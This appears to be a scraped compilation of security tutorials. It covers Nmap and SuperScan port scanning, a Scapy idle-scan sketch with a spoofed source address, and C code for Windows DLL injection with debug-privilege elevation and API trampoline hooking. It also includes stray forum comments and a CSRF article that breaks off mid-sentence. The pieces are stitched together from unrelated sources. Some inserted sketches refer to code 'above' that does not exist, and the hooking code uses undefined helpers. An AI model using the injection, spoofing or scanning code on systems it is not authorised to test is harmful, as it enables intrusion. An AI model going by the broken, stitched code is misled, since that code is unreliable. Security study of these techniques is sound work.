P: for IP protocol. nmap -p U:53,111,137,T:21-25,80,139,8080 target -F (Fast (limited port) scan) Specifies that you wish to scan fewer ports than the default. Normally Nmap scans the most common 1,000 ports for each scanned protocol. With -F, this is reduced to 100. nmap -F target -r (Don’t randomize ports) By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead. nmap -r target So this is the end of this part of the series. In the next part, I will go through advanced firewall evasion and custom creation of exploits with Nmap. A short sketch of the IP ID side channel that idle scan is built on follows the references. Warning: The attacks described above were carried out in a lab, with the prior permission of the website owner/administrator. This material is meant for educational purposes only, so do not use it with any malicious intent. References: dumbscan.txt moreipid.txt Idle scan - Wikipedia, the free encyclopedia Source
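To make the side channel concrete, here is a minimal sketch of a single idle scan probe, written with Scapy rather than taken from the Nmap source above. It assumes root privileges and a Scapy install, and ZOMBIE, TARGET and PORT are placeholder lab addresses you must substitute; a real idle scan (as in the code above) sends grouped probes with retries and timing adjustment.

#!/usr/bin/env python3
# Single idle-scan probe sketch using Scapy (run as root on a lab network).
from scapy.all import IP, TCP, sr1, send

ZOMBIE, TARGET, PORT = "192.168.1.50", "192.168.1.60", 80

def zombie_ipid():
    # Probe the zombie with a SYN/ACK; its RST reply reveals its current IP ID.
    rst = sr1(IP(dst=ZOMBIE)/TCP(dport=80, flags="SA"), timeout=2, verbose=0)
    return rst[IP].id if rst else None

before = zombie_ipid()
# Spoof a SYN to the target with the zombie as the source address. If the
# port is open, the target SYN/ACKs the zombie, which answers with a RST
# and thereby increments its own IP ID counter.
send(IP(src=ZOMBIE, dst=TARGET)/TCP(dport=PORT, flags="S"), verbose=0)
after = zombie_ipid()

if before is not None and after is not None:
    delta = (after - before) % 65536
    # delta == 2: our probe plus the zombie's extra RST -> port likely open
    # delta == 1: only our probe touched the zombie -> port closed|filtered
    print("open" if delta == 2 else "closed|filtered")

This only works against a zombie with a globally incrementing IP ID counter and little other traffic, which is exactly what the proxy checks in the source above are guarding.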
-
As always, scanning is the initial stage of information gathering during reconnaissance. What is Reconnaissance? Reconnaissance means collecting as much information about a target network as possible. From a hacker’s perspective, the information gathered is very helpful for mounting an attack; to block that type of malicious attempt, a penetration tester generally tries to find the same information and patch any vulnerabilities found. This is also called footprinting. Information gathering can usually uncover the following: E-mail addresses Port numbers/protocols OS details Running services Traceroute/DNS information Firewall identification and evasion And many more… So scanning is the first part of information gathering. For scanning, Nmap is a great tool for discovering open ports, protocol numbers, OS details, firewall details, etc. Introduction To Nmap Nmap (Network Mapper) is an open-source tool that specializes in network exploration and security auditing, originally published by Gordon “Fyodor” Lyon. The official website is Nmap - Free Security Scanner For Network Exploration & Security Audits. Nmap is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. Installation Of Nmap Nmap has great support for different environments. Windows: Install from the official site, Nmap - Free Security Scanner For Network Exploration & Security Audits. For Windows, both GUI and command-line options are available. The GUI option for Nmap is Zenmap. Linux (Ubuntu and Debian): Run this command in the Linux terminal: apt-get install nmap In the below image, I have already installed Nmap. For Red Hat and Fedora based systems: yum install nmap For Gentoo Linux based systems: emerge nmap Here, I will show everything in the Linux terminal. Nmap Scripting Engine The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. These scripts are written in the Lua programming language. Nmap’s script engine does many things; some of them are described below: Network discovery This is Nmap’s bread and butter. Examples include looking up WhoIs data based on the target domain, querying ARIN, RIPE, or APNIC for the target IP to determine ownership, performing identd lookups on open ports, SNMP queries, and listing available NFS/SMB/RPC shares and services. Vulnerability detection When a new vulnerability is discovered, you often want to scan your networks quickly to identify vulnerable systems before the bad guys do. While Nmap isn’t a comprehensive vulnerability scanner, NSE is powerful enough to handle even demanding vulnerability checks. Many vulnerability detection scripts are already available, and the developers plan to distribute more as they are written. Backdoor detection Many attackers and some automated worms leave backdoors to enable later reentry. Some of these can be detected by Nmap’s regular expression-based version detection. Vulnerability exploitation As a general scripting language, NSE can even be used to exploit vulnerabilities rather than just find them. The capability to add custom exploit scripts may be valuable for some people (particularly penetration testers), though the developers aren’t planning to turn Nmap into an exploitation framework such as Metasploit. As you can see below, I have used the -sC option (or --script=default), which runs the default script scan against the target network. You can see we got ssh, rpcbind, and netbios-ssn, but the ports are either filtered or closed, so there may be a firewall blocking our requests. Later we will discuss how to identify firewalls and try to evade them. Now I am going to run a ping scan with the discovery scripts enabled, so that Nmap tries all possible scanning methods; that way I will get more juicy information. As you can see in the image, it is trying all possible methods as per the script rules. See the next image for more information. Can you see the interesting ports and protocols? You can see the DNS brute-force script found that the host has blog, cms, sql, log, mail, and many more subdomains. So here we could test for SQL injection; the blog may be WordPress, Joomla, etc., so we can go after a known CMS vulnerability, and obviously the method will be black-box pentesting. In an upcoming chapter I will describe how to write your own NSE scripts and how to exploit targets with them. Basic Scanning Techniques So here I will show the basic techniques for scanning a network/host. But before that, you should know some basics about the port states Nmap reports after scanning. Port Status: After scanning, you may see results with a port status like filtered, open, closed, etc. Let me explain these. Open: This indicates that an application is listening for connections on this port. Closed: This indicates that the probes were received but there is no application listening on this port. Filtered: This indicates that the probes were not received and the state could not be established; the probes are being dropped by some kind of filtering. Unfiltered: This indicates that the probes were received but a state could not be established. Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state. Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state. Let’s Scan Hosts Scan A Single Network Go to your Nmap (either Windows/Linux) and run the command: nmap 192.168.1.1 (or a host name). Scan Multiple Networks/Targets In Nmap you can even scan multiple targets for host discovery/information gathering. Command: nmap host1 host2 host3 … It will work for an entire subnet as well as for different IP addresses. You can also scan multiple websites/domain names at a time with the same command. See the below picture. Nmap will convert each domain name to its equivalent IP address and scan the targets. Scan a Range Of IP Addresses Command: nmap 192.168.2.1-100 Nmap can also be used to scan an entire subnet using CIDR (Classless Inter-Domain Routing) notation.
Usage syntax: nmap [Network/CIDR] Ex: nmap 192.168.2.1/24 Scan a list of targets If you have a large number of systems to scan, you can enter the IP addresses (or host names) in a text file and use that file as input for Nmap on the command line. Syntax: nmap -iL [list.txt] Scan Random Targets The -iR parameter can be used to select random Internet hosts to scan. Nmap will randomly generate the specified number of targets and attempt to scan them. Syntax: nmap -iR [number of hosts] It is not a good habit to run random scans unless they are part of an authorized project. The --exclude option is used with Nmap to exclude hosts from a scan. Syntax: nmap [targets] --exclude [host(s)] Ex: nmap 192.168.2.1/24 --exclude 192.168.2.10 Aggressive Scan The aggressive scan selects the most commonly used options within Nmap, as a simple alternative to writing long strings of flags. It also performs traceroute, etc. Command: nmap -A host Discovery With Nmap Discovery with Nmap is very interesting and very helpful for penetration testers. During discovery one can learn about services, port numbers, firewall presence, protocols, operating system, etc. We will discuss them one by one. Don’t Ping The -PN option instructs Nmap to skip the default discovery check and perform a complete port scan on the target. This is useful when scanning hosts that are protected by a firewall that blocks ping probes. Syntax: nmap -PN target By specifying this option, Nmap will discover the open ports without ping, even on unpingable systems. Ping Only Scan The -sP option performs a ping-only scan. It is most useful when you have a group of IP addresses and you don’t know which ones are reachable. By specifying a particular target, you can get even more information, like the MAC address. Syntax: nmap -sP target TCP SYN Ping Before we start, we must understand the SYN packet. Basically, a SYN packet is used to initiate a connection between two hosts. The TCP SYN ping sends a SYN packet to the target system and listens for a response. This alternative discovery method is useful for systems that are configured to block standard ICMP pings. The -PS option performs a TCP SYN ping. Syntax: nmap -PS targets The default port is port 80. You can also specify other ports, like -PS22,23,25,443. TCP ACK Ping Scan This type of scan sends only an acknowledgement (ACK) packet. The -PA option performs a TCP ACK ping on the specified target, causing Nmap to send TCP ACK packets to the specified hosts. Syntax: nmap -PA target This method attempts to discover hosts by acknowledging TCP connections that do not exist, in an attempt to solicit a response from the target. Like other ping options, it is useful in situations where standard ICMP pings are blocked. UDP Ping Scan The -PU option performs a UDP ping scan of the target. This type of scan sends UDP packets to elicit a response. Syntax: nmap -PU target You can also specify port numbers for scanning, like -PU22,80,25. In the above picture, the target is my LAN’s IP, which doesn’t have any UDP services. SCTP INIT Ping The -PY parameter instructs Nmap to perform an SCTP INIT ping. This option sends an SCTP packet containing a minimal INIT chunk. This discovery method attempts to locate hosts using the Stream Control Transmission Protocol (SCTP). SCTP is typically used on systems for IP-based telephony. Syntax: nmap -PY target In the picture, since there are no SCTP services on the machine, we had to use the -Pn option for discovery. To show what two of these discovery probes actually look like on the wire, a short sketch follows.
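The following is a minimal sketch, not part of the original article, of hand-rolling the TCP SYN and TCP ACK ping probes just described. It assumes Scapy, root privileges, and a placeholder TARGET address.

#!/usr/bin/env python3
# Hand-rolled versions of what `nmap -PS80 target` and `nmap -PA80 target`
# put on the wire. Sketch only: TARGET is a placeholder lab address.
from scapy.all import IP, TCP, sr1

TARGET = "192.168.1.1"

def syn_ping(host, port=80):
    # A live host answers a SYN with either a SYN/ACK (open) or a RST
    # (closed); any TCP reply proves the host is up.
    reply = sr1(IP(dst=host)/TCP(dport=port, flags="S"), timeout=2, verbose=0)
    return reply is not None and reply.haslayer(TCP)

def ack_ping(host, port=80):
    # An unsolicited ACK belongs to no connection, so a live host answers
    # with a RST (flag bit 0x04) -- handy where ICMP echo is filtered.
    reply = sr1(IP(dst=host)/TCP(dport=port, flags="A"), timeout=2, verbose=0)
    return reply is not None and reply.haslayer(TCP) and bool(reply[TCP].flags & 0x04)

print("up" if syn_ping(TARGET) or ack_ping(TARGET) else "no response")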
ICMP Echo Ping The -PE option performs an ICMP (Internet Control Message Protocol) echo ping on the specified system. Syntax: nmap -PE target This type of discovery works best on local networks, where ICMP packets can be transmitted with few restrictions. ICMP Timestamp Ping The -PP option performs an ICMP timestamp ping. ICMP Address Mask Ping The -PM option performs an ICMP address mask ping. Syntax: nmap -PM target This unconventional ICMP query (similar to the -PP option) attempts to ping the specified host using alternative ICMP query types. This type of ping can occasionally sneak past a firewall that is configured to block standard echo requests. IP Protocol Ping The -PO option performs an IP protocol ping. Syntax: nmap -PO protocol target An IP protocol ping sends packets with the specified protocol to the target. If no protocols are specified, the default protocols 1 (ICMP), 2 (IGMP), and 4 (IP-in-IP) are used. ARP Ping The -PR option instructs Nmap to perform an ARP (Address Resolution Protocol) ping on the specified target. Syntax: nmap -PR target The -PR option is automatically implied when scanning the local network. This type of discovery is much faster than the other ping methods. Traceroute The --traceroute parameter can be used to trace the network path to the specified host. Syntax: nmap --traceroute target Force Reverse DNS Resolution The -R parameter instructs Nmap to always perform a reverse DNS resolution on the target IP address. Syntax: nmap -R target The -R option is useful when performing reconnaissance on a block of IP addresses, as Nmap will try to resolve the reverse DNS information of every IP address. Disable Reverse DNS Resolution The -n parameter is used to disable reverse DNS lookups. Syntax: nmap -n target Reverse DNS can significantly slow an Nmap scan. Using the -n option greatly reduces scanning times, especially when scanning a large number of hosts. This option is useful if you don’t care about the DNS information for the target system and prefer a scan which produces faster results. Alternative DNS Lookup Method The --system-dns option instructs Nmap to use the host system’s DNS resolver instead of its own internal method. Syntax: nmap --system-dns target Manually Specify DNS Servers The --dns-servers option is used to manually specify DNS servers to be queried when scanning. Syntax: nmap --dns-servers server1 server2 target The --dns-servers option allows you to specify one or more alternative servers for Nmap to query. This can be useful for systems that do not have DNS configured or if you want to prevent your scan lookups from appearing in your locally configured DNS server’s log file. List Scan The -sL option simply lists the specified targets and performs a reverse DNS lookup on each IP address. Syntax: nmap -sL target In the next installment, I will discuss how to discover services, hosts, and banners using different methods, how to find firewalls and evade them using Nmap's NSE, and how to write your own NSE scripts. The most important part of Nmap is knowing how to find vulnerabilities and try to exploit them. Stay tuned. A small wrapper that automates the list-of-targets workflow follows the reference. Reference Nmap - Free Security Scanner For Network Exploration & Security Audits. Source
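As a small companion to the list-scan and ping-scan options above, here is a sketch that drives the nmap binary itself over a list of targets and extracts the live hosts from greppable output. It assumes nmap is on the PATH and that targets.txt is a placeholder file with one target per line.

#!/usr/bin/env python3
# Batch ping sweep using nmap's own -iL (input list) and -oG (greppable
# output) options, then picking out the hosts reported as up.
import subprocess

result = subprocess.run(
    ["nmap", "-sn", "-iL", "targets.txt", "-oG", "-"],  # -sn is the newer spelling of -sP
    capture_output=True, text=True, check=True,
)

up_hosts = [
    line.split()[1]                        # the field after "Host:" is the IP address
    for line in result.stdout.splitlines()
    if line.startswith("Host:") and "Status: Up" in line
]
print("\n".join(up_hosts))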
-
API hooking is a technique by which we can instrument and modify the behavior and flow of API calls. API hooking can be done using various methods on Windows, including memory breakpoints and JMP instruction insertion; we will briefly discuss the trampoline insertion technique. Hooking can be used to introspect calls in a Windows application, or to capture information related to the API calls. Let us consider the following application making some basic Win32 API calls.

/*************************************************
Simple WIN32 APP making some API calls
************************************************/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    MessageBox(NULL, "Hello world", "Hello World!", MB_OK);
    return EXIT_SUCCESS;
}

Running this program will lead us to this message box: Now let us consider the situation that we want to monitor the call to the message box. The following diagram illustrates the procedure. The code which is responsible for the jump to the hooked DLL is known as the trampoline. So the basic idea is to redirect the call at the base of the API function. For injection-related purposes, we will create an injector. Following is the code for the injector exe that will be used to create a process in suspended mode or to inject into a running process.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    char *pName = 0;
    unsigned int type = 0, PID;
    char psDLLname[MAX_PATH] = {0};
    LPVOID pvMem = NULL;
    DWORD rc;
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo;
    HANDLE hProcess, hThread;

    if (argc < 3) {
        printf("[] Usage: %s <ProcessName>/<ProcessID> <type = 1 for injection, 2 for creation>\n", argv[0]);
        exit(0);
    }
    type = atoi(argv[2]);
    EnableDebugPriv();
    printf("\n[] Type = %d, Process Name = %s\n", type, argv[1]);
    ZeroMemory(&StartupInfo, sizeof(StartupInfo));
    StartupInfo.cb = sizeof StartupInfo; /* only compulsory field */

    if (type == 1) { /* injection into a running process */
        PID = atoi(argv[1]);
        hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
                               PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, PID);
        if (!hProcess) {
            printf("Open Process Failed..");
        }
    } else { /* creation of a new, suspended process */
        pName = argv[1];
        CreateProcess(pName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,
                      NULL, NULL, &StartupInfo, &ProcessInfo);
        hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
                               PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE,
                               ProcessInfo.dwProcessId);
    }

    /* The hook DLL is expected to sit next to the injector: <injector>.dll */
    GetModuleFileName(NULL, psDLLname, MAX_PATH);
    strcat(psDLLname, ".dll");

    /* Write the DLL path into the target and force-load it via LoadLibrary */
    pvMem = VirtualAllocEx(hProcess, 0, MAX_PATH, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, pvMem, psDLLname, MAX_PATH, NULL);
    hThread = CreateRemoteThread(hProcess, 0, 0,
                                 (LPTHREAD_START_ROUTINE)LoadLibrary, pvMem, 0, &rc);
    ResumeThread(hThread);
    ResumeThreads(ProcessInfo.dwProcessId, 1); /* helper from the original article that resumes the suspended process */
}

In order to open other processes this way, we have to elevate our token with the SE_DEBUG privilege. For that purpose we can use the following API calls.

void EnableDebugPriv(void)
{
    HANDLE hToken;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        _debug();
        return;
    }
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
        _debug();
        CloseHandle(hToken);
        return;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))
        _debug();
    CloseHandle(hToken);
}

Similar code can be found here: Enabling and Disabling Privileges in C++ (Windows) Inside the DLL we need to code a handler and JMP replacer for the API call MessageBoxA. The JMP instruction has the following opcode structure: JMP = {0xE9} ADDRESS = {0x00, 0x00, 0x00, 0x00} where ADDRESS = jump destination - (EIP + sizeof(opcode)), which can simply be calculated using the following code:

unsigned char* JMP_OPCODE(unsigned int addr, unsigned int Hook)
{
    static unsigned char OPCODE[0x06] = {0xe9, 0x00, 0x00, 0x00, 0x00, 0x00};
    unsigned int Addr_RESX = addr - (Hook + 5);  /* relative offset */
    memcpy(&OPCODE[1], &Addr_RESX, sizeof(int));
    return OPCODE;
}

A similar thing can be done for a CALL opcode:

unsigned char* CALL_OPCODE(unsigned int addr, unsigned int Hook)
{
    static unsigned char OPCODE[0x06] = {0xe8, 0x00, 0x00, 0x00, 0x00, 0x00};
    unsigned int Addr_RESX = addr - (Hook + 5);
    memcpy(&OPCODE[1], &Addr_RESX, sizeof(int));
    return OPCODE;
}

For example, if we want the JMP opcode that redirects the MessageBoxA function to our hook, we will use this code in the following way:

void hook_function_MessageBoxA()
{
    /* ... hook code ... */
    /* jump back */
}

/* first argument is the destination (our hook), second is the patch site */
unsigned char *trampoline = JMP_OPCODE((unsigned int)hook_function_MessageBoxA,
                                       (unsigned int)MessageBoxA);

unsigned int org_buffer[5] = {0}; /* this will save the original bytes at the function */
/* getAddr, buffer and x are assumed helpers/locals from the article's full source */
buffer = getAddr("MessageBoxA", "user32.dll");
VirtualProtect(buffer, 5, PAGE_EXECUTE_READWRITE, &x);
MessageBox(NULL, "Hello world!", "Hello world!", MB_OK);

We also need to save the original instructions, and when our hook is called we need to put them back: memcpy(org_buffer, API_CALL, 5); We also need to modify the hooked function to restore the original bytes afterwards:

void hook_function_MessageBoxA()
{
    /* ... hook code ... */
    memcpy(API_CALL, org_buffer, 5);
    __asm { JMP [API_CALL] }
}

A quick numeric check of this offset arithmetic follows at the end of this post. Source
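To sanity-check the offset arithmetic above without touching a live process, here is a small sketch, not from the article, that reproduces the JMP_OPCODE formula in Python with made-up example addresses.

#!/usr/bin/env python3
# Reproduces the trampoline math: rel32 = destination - (patch_site + 5),
# then a 5-byte near JMP is 0xE9 followed by that offset, little-endian.
import struct

def jmp_opcode(dest: int, src: int) -> bytes:
    rel = (dest - (src + 5)) & 0xFFFFFFFF   # wrap like a 32-bit register
    return b"\xe9" + struct.pack("<I", rel)

# Example: patch a function at 0x77D507EA to jump to a hook at 0x10001000.
# These addresses are illustrative only.
print(jmp_opcode(0x10001000, 0x77D507EA).hex())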
-
Congratulations @sleed, let us know if you receive the HOF.
-
Don't put the phone in the microwave, @Bebe. If you do a restore, it will ask for the iCloud account.
-
Given the massive spread of the Internet and Internet-related activities in recent times, there is an equal spread in silent activities behind the web too. These silent activities might relate to port scanning, vulnerability scanning, finding publicly available technical and non-technical information about target organizations, and so on. At any given point in time, there are many such scans being done on the Internet; most of them are harmless, but some are done with malicious intent. This paper seeks to give a soup-to-nuts overview of port scanning by discussing the definition of port scanning, port scanning as part of a security assessment, different types of scans, Super Scan 4.1, and port scan detectors. Definition of port scanning As already stated, port scanning can be used for malicious purposes or for genuine purposes. It is a commonly known fact that there are 65,535 TCP ports and 65,535 UDP ports. Port numbers ranging from 0 to 1023 are the well-known ports. As an example, port number 80 is associated with HTTP, port number 21 is mapped to FTP, port 25 to SMTP, and so on. Port scanning is a reconnaissance technique which involves scanning a host for open and active ports. It primarily involves sending a message to each of the individual ports and detecting which are open. These open ports offer vulnerabilities that can be exploited and can sometimes even bring down production environments. There are numerous port scanning tools; popular examples are Nmap and Super Scan. We will discuss McAfee’s Super Scan 4.1, which is a Windows port scanning tool, later in this paper. The “good way” of doing port scanning The activity of port scanning can be done as part of a security assessment of one’s own organization, seeking to weed out security holes. It is a proactive approach that seeks out vulnerabilities and removes them, rather than a reactive one. The malicious way of doing port scanning Hackers, or anyone with malicious intent, can use port scanning to systematically probe for open ports, which might allow them to gain entry into organizations and steal private data. Statistics relating to port scanning Before we move on to the other specific details relating to port scanning, we’ll first discuss some statistics. The activity of port scanning itself deals with port numbers and IP addresses, so let us first get the bare facts about these two important concepts. There are 2^32 (about 4 billion) IPv4 addresses in the world as of April 2012. (List of countries by IPv4 address allocation). Let us see the details regarding these 2^32 IP addresses… According to this report from Internet Census 2012: “165 million IPs had one or more of the top 150 ports open. 36 million of these IP addresses did not respond to ICMP ping. 141 million IPs had only closed/reset ports and did not respond to ICMP ping.” (Port scanning /0 using insecure embedded devices) Next we will discuss port scanning as part of the security assessment of an organization. Security assessment and port scanning Port scanning is the first step in vulnerability scanning, which is part of a security assessment. These are the steps when performing a security assessment: Planning The scope of security assessments should be planned and approved by senior management. Reconnaissance Reconnaissance is a stage where public information about the organization is probed and retrieved. Network service discovery In this stage we discover the hosts and servers that can be accessed from outside. These could then be used for cyber attacks. Vulnerability discovery The servers and hosts that are visible from outside are then probed for vulnerabilities. This is where port scanning takes place and open ports are identified. Verification of perimeter devices Perimeter devices like firewalls, routers, IDS and IPS are evaluated to make sure that they function according to standards. Remote access We make sure that remote access devices like VPNs and wireless access points are configured properly. Result analysis and documentation This is the last step in the security assessment; we finally document the results by determining whether the vulnerabilities found can defeat the security controls in place. (Stephen Northcutt) In this post we will only explore the steps relating to gathering public information and vulnerability discovery, which pertain more to “port scanning”. Gathering public information Before we find vulnerable ports to launch attacks, it is also important to gather as much information from public sources as possible. We will discuss two websites that are good sources of public information: ‘Netcraft.com’ gives detailed information about the “technologies that power a website”. (Netcraft.com) For example, we get the following information when we search for ‘Google.com’ on the ‘Netcraft’ website: We see the information related to IP address, IPv6 address, hosting country, DNS admin, and other things. To get the IP addresses associated with a particular organization, we next query the ARIN database. ARIN stands for ‘American Registry for Internet Numbers’. When the ‘Google.com’ website is queried, it returns the following result: Once enough public, technical and non-technical information has been gathered, the next step will be to do a vulnerability assessment. It is in the vulnerability phase that port scanning is done. Different types of scanning We will next discuss the different types of port scanning techniques. The list presented below gives a broad set of scanning techniques. Vanilla connect() scanning This is the simplest of all scanning techniques; it involves attempting a full connection to each and every port and detecting which ones respond. If there is a response from a port, it indicates that the port is open and could be used to launch an attack. However, since this is a very simple scan, it can be detected and logged by network perimeter devices. Both ‘Nmap’ and ‘Super Scan’ can be used to perform vanilla scans. Stealth scanning Since the vanilla scanning technique can be detected by perimeter devices like firewalls and IDS, ‘stealth scanning’ can be used by hackers, which goes undetected by auditing tools. This type of scanning involves sending packets with stealth flags: “some of the flags are SYN, FIN and NULL”. (Surveying Port Scans and Their Detection Methodologies, 2010) Bounce Scan This type of scan is used to scan ports discreetly and indirectly. It is most prevalent with the FTP protocol, which is why it is commonly called the ‘FTP bounce attack’. The attacker uses the PORT command to reach ports on the target machine through a vulnerable intermediate FTP server; the vulnerable FTP server is the one used to bounce off the attacks. UDP scanning This type of scanning involves finding open ports related to the UDP protocol. Super Scan 4.1 Now that we have seen the concept of port scanning and how to gather public information, we will now actually do ‘port scanning’. We will discuss Super Scan 4.1, which is a powerful port scanner, pinger and resolver. While ‘Nmap’ is a free port scanning tool for different operating systems, Super Scan 4.1 is a Windows-only port scanner from McAfee. Super Scan 4.1 is expected to run only on Windows XP and 2000. Listed below are some of the features of Super Scan 4.1: It provides superior scanning speed for detecting both UDP and TCP open ports. TCP SYN scanning is possible. Different tools such as ping, ICMP traceroute, Whois, and zone transfer are available. We can read the IP addresses which need to be scanned from a file. The results of the scan can be read in an HTML file. TCP and UDP banner grabbing are available. (Super Scan 4.1) Running Super Scan 4.1 Super Scan 4.1 might not be as popular as its counterpart ‘Nmap’; nevertheless, it is a good port scanner with good features. The minor drawback is that it works only with Windows systems. It can be downloaded from the following link: SuperScan | McAfee Free Tools The important point when trying to run Super Scan 4.1 is that it can only be ‘Run as Administrator’. In order to do this, it is necessary to right-click on the ‘Super Scan 4.1.exe’ and click ‘Run as administrator’ as shown in the picture below. As an example, let us try to port scan our own computer for open ports. The most important tabs to work with in port scans are the ‘Host and Service Discovery’ tab and the ‘Scan’ tab. Host and Service Discovery tab In order to scan all UDP and TCP ports in the range 0-65535 on one’s own computer, it is necessary to click the ‘Host and Service Discovery’ tab and enter the range in the fields as shown below. Note: The ports to be scanned can also be read from a file. Next, the UDP port scan type needs to be selected as ‘Data+ICMP’ and the TCP port scan type needs to be specified as ‘Connect’. Once the ‘Host and Service Discovery’ tab has been configured, we next configure the IP address of the target system, or the range of IP addresses that need to be port scanned, by means of the ‘Scan’ tab. Scan tab We begin by entering the IP address or the host name of one’s own computer. The IP address of one’s own computer can be found by using the ‘ipconfig’ command at the DOS window. We locate the IPv4 address and enter it in the ‘Hostname/IP’ field. The above picture shows where the IP address needs to be entered. Once the ‘Start’ button is clicked, scanning is in progress and the results will be seen as shown. These results can also be viewed in HTML format. Tools tab Next, we discuss the ‘Tools’ tab in Super Scan 4.1. Once the IP address, host name or URL is stated, we can perform various actions with the tools provided. Super Scan 4.1 allows you to perform: Hostname/IP Lookup Ping ICMP Traceroute Zone transfer HTTP HEAD request HTTP GET request HTTPS GET request Whois CRSNIC Whois IP ARIN WhoisIP RIPE WhoisIP APNIC WhoisIP We have seen the different features of the Windows port scanning tool ‘Super Scan 4.1’. The activity of port scanning itself can be reduced by deploying firewalls at critical locations. While it is possible to port scan the entire set of IP addresses across the world (which might take several days), it is not a good idea, as port scan detectors might be employed by different websites, causing you to be blacklisted. (masscan) Conclusion In conclusion, we will just touch on the topic of port scan detectors. If there is a tool to scan ports, then there will be a tool to “detect” port scanners. Obviously, every bad needs a good, and in this respect a port scan detector is the countermeasure to port scanning tools.
Bitdefender’s Internet Security (2014) has features that put all ports on the defensive mode and makes them invisible from outside. (Bitdefender Internet Security (2014)) We have seen the entire life cycle of port scanners from the definition, types, port scanning as part of security assessment, Super Scan tool as well as port scanner detectors. More tools with improved and sophisticated features will be developed as the years go by. Bibliography Bitdefender Internet Security (2014). (n.d.). Retrieved July 9, 2014, from pcmag.com: Shared Privacy Protection - Bitdefender Internet Security (2014) Review & Rating | PCMag.com List of countries by IPv4 address allocation. (n.d.). Retrieved July 4, 2014, from Wikipedia: List of countries by IPv4 address allocation - Wikipedia, the free encyclopedia masscan. (n.d.). Retrieved July 9, 2014, from http://www.tuicool.com/articles/A3qI7b Netcraft.com. (n.d.). Retrieved June 24, 2014, from Netcraft.com: Netcraft | Internet Research, Anti-Phishing and PCI Security Services Port scanning /0 using insecure embedded devices. (n.d.). Retrieved July 4, 2014, from Internet Census 2012: Internet Census 2012 Stephen Northcutt, L. Z. Inside Network Permieter Security. Super Scan 4.1. (n.d.). Retrieved July 7, 2014, from McAfee.com: SuperScan | McAfee Free Tools Surveying Port Scans and Their Detection Methodologies. (2010, August 23). Retrieved July 1, 2014, from http://www.cs.uccs.edu/~jkalita/papers/2011/BhuyanMonowarComputerJournal.pdf Source
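Since the article walks through SuperScan's connect()-style scan, here is a minimal vanilla connect() scanner as a sketch, using only Python's standard library. HOST and the port range are placeholders; only scan machines you are authorized to test.

#!/usr/bin/env python3
# Bare-bones "vanilla connect()" scanner: attempt a full TCP handshake on
# each port and report the ones where the handshake completes.
import socket

HOST = "127.0.0.1"                       # placeholder target

for port in range(1, 1025):              # the well-known port range
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        # connect_ex returns 0 when the three-way handshake succeeds,
        # i.e. when something is listening on the port.
        if s.connect_ex((HOST, port)) == 0:
            print(f"Port {port}/tcp open")

Because every probe is a completed connection, this is exactly the kind of scan that perimeter devices log easily, which is why vanilla scans are considered noisy.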
-
Cross Site Request Forgery, or CSRF, is one of the OWASP Top 10 vulnerabilities. It exploits the website’s trust in the browser. This vulnerability harms users and can modify or delete their data by abusing actions performed from their own browser. The advantage for the attacker is that the action is performed as a valid user, but the user never knows that he has done anything. If the target account belongs to the website administrator, the attacker can perform the admin’s actions on the web application. Poor coding and wrong assumptions are the main reasons why this vulnerability exists in web applications. Sometimes it is tricky to understand how this vulnerability is exploited by attackers. In this detailed article, we will understand the Cross Site Request Forgery vulnerability, and we will create a form with strong protection against it. We will also see popular frameworks, scripts and methods that can be used to patch this vulnerability. What is a Cross Site Request Forgery Attack? Cross Site Request Forgery, or CSRF, is an attack that forces a malicious action onto an innocent website from an end user’s (valid user’s) browser while he/she is running a valid session on the website. If a user is authenticated on a website, every action performed from his browser will belong to him. The website thinks that the request is coming from the user and has been made by him. The most common effects of this attack are change of password, fund transfer from a bank account, purchase of an item, etc. This attack is performed by crafting fake forms or requests that behave exactly the same as those on the original website. When these requests are sent to a website from an authenticated user’s browser, the website thinks the request has been made by the user. In the next section, we will see how CSRF works. How CSRF Works: Most of the time, the attacker uses a third-party trusted website to perform this attack. Fake links are posted on forums and social networking websites that may lead to CSRF. The attack follows a sequence of requests and responses. Suppose a victim is logged in on the target website. He finds a link on a forum; the link triggers a malicious action on the target website. He clicks on the link, and the link sends the malicious request to the target website. Now for example: You are logged in on a website http://targetwebsite.com. This website has a delete-account action, triggered by a button on a page. This button submits a delete request via a form like this: <form action='http://targetwebsite.com/deleteaccount.php' method='post'> <input type='submit' value='Delete' name='delete'> </form> Once the button is clicked, the website will delete the account of the logged-in user. So, it relies on the active session to identify the user. The 